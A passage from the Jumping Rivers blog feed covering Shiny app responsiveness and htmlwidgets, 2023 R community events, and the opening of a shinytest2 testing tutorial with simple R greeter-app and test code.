&lt;p&gt;As already mentioned, responsiveness and performance are two &lt;em&gt;different&lt;/em&gt; aspects of the user experience. Nevertheless, improving the performance of an app can lessen the need to provide extra feedback like loading indicators.&lt;/p&gt;
&lt;p&gt;If you do find that the user has to wait for an extended period it may be worth rethinking the amount of processing that your shiny app is performing: could you reduce the amount of computation occuring inside the app (by caching plots and tables, or by precomputing your data), could the app be using too much reactivity or regenerating UI elements unnecessarily? We&amp;rsquo;ve &lt;a href="https://www.jumpingrivers.com/blog/who-shiny-covid-maintenance-continuous-integration/"&gt;previously discussed&lt;/a&gt; how we took the loading times of a World Health Organization app from minutes(!) to seconds. The Shiny documentation also gives advice on how the likes of &lt;a href="https://shiny.rstudio.com/articles/caching.html" rel="external"&gt;caching&lt;/a&gt; and &lt;a href="https://shiny.rstudio.com/articles/async.html" rel="external"&gt;async programming&lt;/a&gt; can be used to bolster performance. &lt;a href="https://engineering-shiny.org/common-app-caveats.html" rel="external"&gt;Chapter 15&lt;/a&gt; of &lt;a href="https://engineering-shiny.org/index.html" rel="external"&gt;Engineering Production-Grade Shiny Apps&lt;/a&gt; covers, in detail, some common performance pitfalls and how to solve them.&lt;/p&gt;
&lt;h2 id="taking-the-next-step-with-htmlwidgets"&gt;Taking the next step with {htmlwidgets}&lt;/h2&gt;
&lt;p&gt;If you want your app to feel like it responds instantaneously to interactions then you probably need to look at &lt;a href="https://www.htmlwidgets.org/index.html" rel="external"&gt;{htmlwidgets}&lt;/a&gt;. By moving some of the work from a Shiny server to the user&amp;rsquo;s own browser these can, in principle at least, provide instant (~0.1 seconds or less) updates - typically to a visualisation or table - in response to a user&amp;rsquo;s interactions. The result is an enhanced feeling of &lt;a href="https://www.nngroup.com/articles/direct-manipulation/" rel="external"&gt;direct manipulation&lt;/a&gt;:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Direct manipulation (DM) is an interaction style in which users act on displayed objects of interest using physical, incremental, reversible actions whose effects are immediately visible on the screen.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;There are an ever-increasing number of such widgets available off-the-shelf. From &lt;a href="https://github.com/plotly/plotly.R" rel="external"&gt;{plotly}&lt;/a&gt; charts, to &lt;a href="http://rstudio.github.io/leaflet/" rel="external"&gt;{leaflet}&lt;/a&gt; maps, to &lt;a href="https://rstudio.github.io/DT/" rel="external"&gt;{DT}&lt;/a&gt; data tables. Use of the latter is shown in the video below, where filtering and sorting occurs instantly following my interactions. There&amp;rsquo;s no lag where I might get distracted and forget what I just did and if I err I don&amp;rsquo;t have to wait for a server to tell me so before I retrace my steps.&lt;/p&gt;
&lt;video autoplay loop controls style="display: block; max-width: 100%" aria-label="Video showing usage of the DT htmlwidget" aria-description="Ten rows of the iris dataset can be seen. The user can be seen entering letters into the search box to instantly filter the data and then clicking on columns to sort by them."&gt;
&lt;source src="assets/dt-table.mp4" type="video/mp4"&gt;
&lt;/video&gt;
&lt;p&gt;Most HTML widgets are wrappers around pre-existing JavaScript libraries. That means you could get the same widget functionality without using R and Shiny at all. But the power of htmlwidgets is how easily they can fit into your extant workflows, typically requiring just a few lines of R code. This is advantageous because you use the widgets without having to understand the underlying web technologies, but also because R has a much richer ecosystem for data science than JavaScript. By using them together you can harness the benefits of both. If you want to create your own widgets, however, you do need &lt;em&gt;some&lt;/em&gt; knowledge of HTML, CSS and JavaScript. That&amp;rsquo;s beyond the scope of this article, but if you are interested to learn more then John Coene&amp;rsquo;s &lt;a href="https://book.javascript-for-r.com/" rel="external"&gt;JavaScript for R&lt;/a&gt; book is thorough and free to read online.&lt;/p&gt;
&lt;h2 id="widgets-and-animation"&gt;Widgets and animation&lt;/h2&gt;
&lt;p&gt;Moving work from server to browser makes it more practical to use another pedagogical tool: animation. After all, things would likely feel pretty clunky to the user if they clicked a button in the UI, then had to wait while data was sent to and back-from a server before animations finally kicked off.&lt;/p&gt;
&lt;p&gt;When it comes to animated visualisations, you&amp;rsquo;re probably already familiar with Hans Rosling&amp;rsquo;s talks using the &lt;a href="https://www.gapminder.org/tools/#$chart-type=bubbles&amp;url=v1" rel="external"&gt;Trendalyzer tool&lt;/a&gt; from &lt;a href="https://www.gapminder.org/" rel="external"&gt;Gapminder&lt;/a&gt;, for example &lt;a href="https://youtu.be/hVimVzgtD6w" rel="external"&gt;&lt;em&gt;The best stats you&amp;rsquo;ve ever seen&lt;/em&gt;&lt;/a&gt;. From these we see that with animations it&amp;rsquo;s easy to track a point or collection of points in a two-dimensional scatter plot as a third dimension (such as time) changes.&lt;/p&gt;
&lt;p&gt;But &lt;a href="http://vis.stanford.edu/papers/animated-transitions" rel="external"&gt;Heer and Robertson&lt;/a&gt; found that, with a bit of care, animations can be used to aid much more drastic changes: going from one chart form to another, e.g. a scatter plot to a bar chart or a bar chart to a donut. They also used animations to show data drilldown - in this case going &lt;a href="https://vimeo.com/19278444#t=1m15s" rel="external"&gt;from an individual bars to stacked bar and on to grouped bars&lt;/a&gt; - and found both a reduction in user error performing some simple tasks and a strong user preference for the use of these animations.&lt;/p&gt;
&lt;p&gt;In a recent project with &lt;a href="https://utahtech.edu/" rel="external"&gt;Utah Tech University&lt;/a&gt; we built a pair of custom widgets - using the popular &lt;a href="https://d3js.org/" rel="external"&gt;d3&lt;/a&gt; JavaScript library - for embedding in Shiny dashboards, visualising student admission and retention data. The video below shows the JavaScript library we built for the widgets in action - a Sankey (or, more precisely, alluvial) diagram - but repurposed with the diamonds data from the {ggplot2} package that you may be more familiar with. The library offers immediate feedback with a customisable popup and link and node highlighting when hovering over any link or node. Moreover, clicking on one of the nodes drills down on that node - revealing information about the clarity for the selected cut in the case shown - and updates other preceding and succeeding steps of the diagram accordingly. Shift-clicking reverses the process.&lt;/p&gt;
&lt;video autoplay loop controls style="display: block; max-width: 100%" aria-label="Video showing usage of our custom Sankey htmlwidget" aria-description="The user can be seen hovering over several nodes and links with a popup appearing in each case. The user then drills down into the data by clicking on a node. The drill-down change is animated."&gt;
&lt;source src="assets/diamonds-example.mp4" type="video/mp4"&gt;
&lt;/video&gt;
&lt;p&gt;All the requisite data processing is done &amp;ldquo;on-the-fly&amp;rdquo;, in the browser and effectively instantaneously (in a few milliseconds) so that, to invert Johnson&amp;rsquo;s language above, the user has the perception of cause and effect; the software&amp;rsquo;s reaction seems to be a result of the user&amp;rsquo;s action.&lt;/p&gt;
&lt;p&gt;You can find out much more about our work with Utah Tech by watching Theo&amp;rsquo;s talk &lt;a href="https://www.youtube.com/watch?v=yVatQQhDgz4" rel="external"&gt;&amp;ldquo;Expect the Unexpected - {Shiny} &amp;amp; {htmlwidgets}&amp;rdquo;&lt;/a&gt; from &lt;a href="https://shiny-in-production-2022.jumpingrivers.com/" rel="external"&gt;Shiny in Production 2022&lt;/a&gt;. The JavaScript code used in the widgets is open source and &lt;a href="https://github.com/jumpingrivers/ard-js" rel="external"&gt;available on GitHub&lt;/a&gt;.&lt;/p&gt;
&lt;h2 id="when-htmlwidgets-and-shiny-applications-might-not-be-the-answer"&gt;When {htmlwidgets} and Shiny applications might not be the answer&lt;/h2&gt;
&lt;p&gt;User experience design is often a case of picking the right tools for the job and there are, of course, times when htmlwidgets may not be the right tools.&lt;/p&gt;
&lt;p&gt;Simple loading and/or progress indicators might be all that&amp;rsquo;s realisable given project constraints on time and/or money. The round trips to a Shiny server may be necessary because the relevant calculations you need to run to update data rely on some complex R (or &lt;a href="https://www.jumpingrivers.com/blog/r-shiny-python-posit-rstudio/" rel="external"&gt;Python!&lt;/a&gt;) code that would be difficult to run in JavaScript. Alternatively, it might be the underlying data itself that is the issue - it needs to be kept private or it might be impractically large to transfer it to a user&amp;rsquo;s browser to process.&lt;/p&gt;
&lt;p&gt;htmlwidgets are quick and easy to add to a project if they already exist, but creating new ones requires additional developer expertise that you may not have in a team focussed on R or Python development.&lt;/p&gt;
&lt;p&gt;It could be that the best solution to a UX problem is simple, static content. As &lt;a href="https://www.nngroup.com/articles/website-response-times/" rel="external"&gt;Jakob Nielsen reported&lt;/a&gt; back in 2010:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Instead of big images, today&amp;rsquo;s big response-time sinners are typically overly complex data processing on the server or overly fancy widgets on the page (or too many fancy widgets).&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Static content has other advantages - it&amp;rsquo;s largely agnostic to device size and form, it&amp;rsquo;s probably easier to make accessible and it&amp;rsquo;s almost certainly quicker and easier to assemble and maintain. As &lt;a href="https://www.youtube.com/watch?v=8_k-iPwcleU" rel="external"&gt;Colin Fay pointed out&lt;/a&gt; in &lt;em&gt;his&lt;/em&gt; Shiny in Production 2022 talk, interactive elements also have a learning curve associated with them that you don&amp;rsquo;t find with a png image or a simple HTML table. Direct manipulation only works if the user understands what and how to manipulate.&lt;/p&gt;
&lt;h2 id="summary"&gt;Summary&lt;/h2&gt;
&lt;p&gt;Improving the responsiveness of a Shiny application can help the user feel more like they are in control and that they are using professional software created by thoughtful designers. Greater responsiveness can be achieved through simple changes like loading indicators and progress bars or through the use of htmlwidgets which move some of the burden from the Shiny server to the user&amp;rsquo;s own browser. However, interactive applications do have a maintenance cost to the designer and a learning curve for the user. It is worthwhile considering whether these costs are justified before starting a project.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/improving-responsiveness-shiny-applications/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Events at Jumping Rivers</title><link>https://www.jumpingrivers.com/blog/events-at-jumping-rivers/</link><pubDate>Tue, 24 Jan 2023 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/events-at-jumping-rivers/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/events-at-jumping-rivers/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/events-at-jumping-rivers/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;At Jumping Rivers we&amp;rsquo;re all about getting involved in the R community! As such, we host multiple events throughout the year. Read on for information about what we have planned so far for 2023!&lt;/p&gt;
&lt;h3 id="conferences"&gt;Conferences&lt;/h3&gt;
&lt;h4 id="satrdays-london-2023"&gt;SatRdays London 2023&lt;/h4&gt;
&lt;p&gt;In April 2023 we will be hosting SatRdays at Bush House, London. SatRdays are low cost, not for profit events aimed to attract those who ordinarily wouldn&amp;rsquo;t be able to attend pricier events, or who can&amp;rsquo;t usually make it during the week.&lt;/p&gt;
&lt;p&gt;Our Keynote speaker for this event is &lt;a href="https://juliasilge.com/" rel="external"&gt;Julia Silge&lt;/a&gt;, Posit. Julia Silge is a data scientist and software engineer at &lt;a href="https://posit.co/" rel="external"&gt;Posit PBC&lt;/a&gt; (formerly RStudio) where she works on open source modeling and MLOps tools. She is an author, an international keynote speaker, and a real-world practitioner focusing on data analysis and machine learning. Julia loves text analysis, making beautiful charts, and communicating about technical topics with diverse audiences.&lt;/p&gt;
&lt;p&gt;We are also accepting abstracts for contributed talks until midnight (GMT) Tuesday, 31st January, so head over to the conference website for more details on how to submit your talk. Anything R related is welcome!&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Where: &lt;a href="https://goo.gl/maps/J2ajU6KDZYF7PtSk7" rel="external"&gt;30 Aldwych, London WC2B 4BG, United Kingdom&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;When: 22nd April 2023&lt;/li&gt;
&lt;li&gt;&lt;a href="https://satrday-london-2023.jumpingrivers.com/" rel="external"&gt;Website&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Data comes in all shapes and sizes. It can often be difficult to know where to start. Whatever your problem, &lt;a href="https://www.jumpingrivers.com/consultancy/data-science-machine-learning/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2023-events-at-jumping-rivers"&gt;Jumping Rivers can help&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h4 id="shiny-in-production-2023"&gt;Shiny in Production 2023&lt;/h4&gt;
&lt;p&gt;Shiny in Production returns to Newcastle this October. Last year&amp;rsquo;s conference was a huge success, and this year we&amp;rsquo;re expecting to be bigger and better than ever. Whether you’re a seasoned {shiny} user who wants to network and share knowledge, someone who’s just getting started and wants to learn from the experts, or anybody in between, if you’re interested in {shiny}, this conference is for you.&lt;/p&gt;
&lt;p&gt;The conference consists of an afternoon of workshops on a range of topics delivered by our JR trainers, followed by a day of talks from experts across a variety of sectors. Last year, the workshops were on RStudio (now Posit) Connect, Tableau and Automated Reporting with Quarto; keep an eye out for when we announce what is in store for this year!&lt;/p&gt;
&lt;p&gt;If you want to take a look at some of what you missed last year, we have a &lt;a href="https://youtube.com/playlist?list=PLbARZQfpqIKJ6Un06aThcKJC7eQMSgKRD" rel="external"&gt;playlist of talk recordings available to watch on YouTube&lt;/a&gt;.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Where: &lt;a href="https://goo.gl/maps/sesSfqZQAmkdRMaA9" rel="external"&gt;The Catalyst, 3 Science Square, Newcastle Helix, Newcastle upon Tyne NE4 5TG, United Kingdom&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;When: 12th - 13th October 2023&lt;/li&gt;
&lt;li&gt;&lt;a href="https://shiny-in-production.jumpingrivers.com/" rel="external"&gt;Website&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="meetups"&gt;Meetups&lt;/h3&gt;
&lt;p&gt;Jumping Rivers currently hosts two data science meetups, the North East Data Scientist (NEDS) meetup and the Leeds Data Science meetup.
These meetups are free events, aimed to bring together like minded people to discuss all things data science.
We invite speakers from a range of backgrounds, including public sector and private industry, to share their experience and demonstrate how data science impacts the world.&lt;/p&gt;
&lt;p&gt;At the NEDS meetups, we also host a pre-event workshop, run by one of our JR trainers, where we&amp;rsquo;ll go into more detail about a specific tool or package and give you the opportunity to code along! And of course, all meetups are great opportunities to network and find out more about what&amp;rsquo;s going on in the world of data science - fueled by pizza of course!&lt;/p&gt;
&lt;h4 id="north-east-data-scientists-neds"&gt;North East Data Scientists (NEDS)&lt;/h4&gt;
&lt;ul&gt;
&lt;li&gt;Where: &lt;a href="https://goo.gl/maps/sesSfqZQAmkdRMaA9" rel="external"&gt;The Catalyst, 3 Science Square, Newcastle Helix, Newcastle upon Tyne NE4 5TG, United Kingdom&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;When: Every two months, third Thursday of the month. Next meetup is 16th March 2023&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.meetup.com/newcastle-upon-tyne-data-science-meetup/" rel="external"&gt;Meetup page&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h4 id="leeds-data-science-meetup"&gt;Leeds Data Science Meetup&lt;/h4&gt;
&lt;ul&gt;
&lt;li&gt;Where: &lt;a href="https://goo.gl/maps/6Cc71DCdZU9uNgqF8" rel="external"&gt;Platform, New Station St, Leeds LS1 4JB, United Kingdom&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;When: Every two months. Next meetup is 31st January 2023&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.meetup.com/leeds-data-science-meetup/" rel="external"&gt;Meetup page&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/events-at-jumping-rivers/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>End-to-end testing with shinytest2: Part 3</title><link>https://www.jumpingrivers.com/blog/end-to-end-testing-shinytest2-part-3/</link><pubDate>Thu, 19 Jan 2023 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/end-to-end-testing-shinytest2-part-3/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/end-to-end-testing-shinytest2-part-3/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/end-to-end-testing-shinytest2-part-3/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;This is the final part of a series of three blog posts about using the
{shinytest2} package to develop automated tests for shiny applications.
In the posts we cover&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://www.jumpingrivers.com/blog/end-to-end-testing-shinytest2-part-1/" rel="external"&gt;the purpose of browser-driven end-to-end tests for a shiny
developer, and tools (like {shinytest2}) that help implement
them&lt;/a&gt;;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://www.jumpingrivers.com/blog/end-to-end-testing-shinytest2-part-2/" rel="external"&gt;how to write and run a simple test using
{shinytest2}&lt;/a&gt;;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;how best to design your test code so that it supports your future
work (this post).&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;By this point in the blog series, we have created a simple shiny
application as an R package, added the {shinytest2} testing
infrastructure, and have written, ran, broken and fixed a {shinytest2}
test case. Here, we will add a new feature to the application. As in
real (programming) life, we will add a new test for this feature, and
ensure that our old test still passes.&lt;/p&gt;
&lt;p&gt;UI-driven end-to-end tests require a bit more code than unit tests. For
example, starting the app and navigating around to set up some initial
state will require a few lines of code. But these are things you’ll
likely need to do in several tests. As you add more and more test cases
and these commonalities reveal themselves, it pays to extract out some
helper functions and / or classes. By doing so, your tests will look
simpler, the behaviour that you are testing will be more explicit, and
you’ll have less code to maintain. We’ll show some software designs that
may simplify your {shinytest2} code.&lt;/p&gt;
&lt;p&gt;This post builds upon the previous posts in the series, but is quite a
bit more technical than either of them. In addition to shiny
development, you’ll need to know how to define functions in R and for
the last section you’ll need to know about object-oriented programming
in R (specifically using R6). The ideas in that section may be of
interest even if you aren’t fluent with R6 classes yet.&lt;/p&gt;
&lt;p&gt;Let’s get started.&lt;/p&gt;
&lt;h2 id="the-initial-application"&gt;The initial application&lt;/h2&gt;
&lt;p&gt;Our initial shiny application had a text field where the user could
enter their name and a “Greet” button. The source code can be obtained
from
&lt;a href="https://github.com/jumpingrivers/blog/tree/main/blogs/r-shinytest2/part-2/" rel="external"&gt;github&lt;/a&gt;.
On clicking the button, a greeting (“Hello &lt;username&gt;!”) is displayed in
the app. The source code for the user interface and server function is
shown below.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# In ./R/ui.R&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;ui &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(req) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;fluidPage&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;textInput&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;name&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;What is your name?&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;actionButton&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;greet&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;Greet&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;textOutput&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;greeting&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# In ./R/server.R&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;server &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(input, output, session) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; output&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;greeting &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;renderText&lt;/span&gt;({
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;req&lt;/span&gt;(input&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;greet)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;paste0&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Hello &amp;#34;&lt;/span&gt;, &lt;span style="color:#d2a8ff;font-weight:bold"&gt;isolate&lt;/span&gt;(input&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;name), &lt;span style="color:#a5d6ff"&gt;&amp;#34;!&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; })
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;For this app we have a single test that checks that the greeting is
displayed once the user has entered their name and clicked the “Greet”
button.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# ./tests/testthat/test-e2e-greeter_accepts_username.R&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;test_that&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;the greeter app updates user&amp;#39;s name on clicking the button&amp;#34;&lt;/span&gt;, {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# GIVEN: the app is open&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; shiny_app &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; shinyGreeter&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;run&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; app &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; shinytest2&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;AppDriver&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;new&lt;/span&gt;(shiny_app, name &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;greeter&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; app&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;set_window_size&lt;/span&gt;(width &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1619&lt;/span&gt;, height &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;970&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# WHEN: the user enters their name and clicks the &amp;#34;Greet&amp;#34; button&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; app&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;set_inputs&lt;/span&gt;(name &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Jumping Rivers&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; app&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;click&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;greet&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# THEN: a greeting is printed to the screen&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; values &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; app&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;expect_values&lt;/span&gt;(output &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;greeting&amp;#34;&lt;/span&gt;, screenshot_args &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;FALSE&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;})
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you require help building a Shiny app? Would you like someone to take over the maintenance burden?
If so, check out
our
&lt;a href="https://www.jumpingrivers.com/consultancy/shiny-dash-flask-dashboard-consultancy/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2023-end-to-end-testing-shinytest2-part-3"&gt;Shiny and Dash&lt;/a&gt;
services.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="writing-your-second-test"&gt;Writing your second test&lt;/h2&gt;
&lt;p&gt;We’ll add a second bit of functionality to the app first. A simple
change, might be to greet the user in Spanish:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# In the UI&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;textOutput&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;spanish_greeting&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# In the server&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;output&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;spanish_greeting &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;renderText&lt;/span&gt;({
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;req&lt;/span&gt;(input&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;greet)
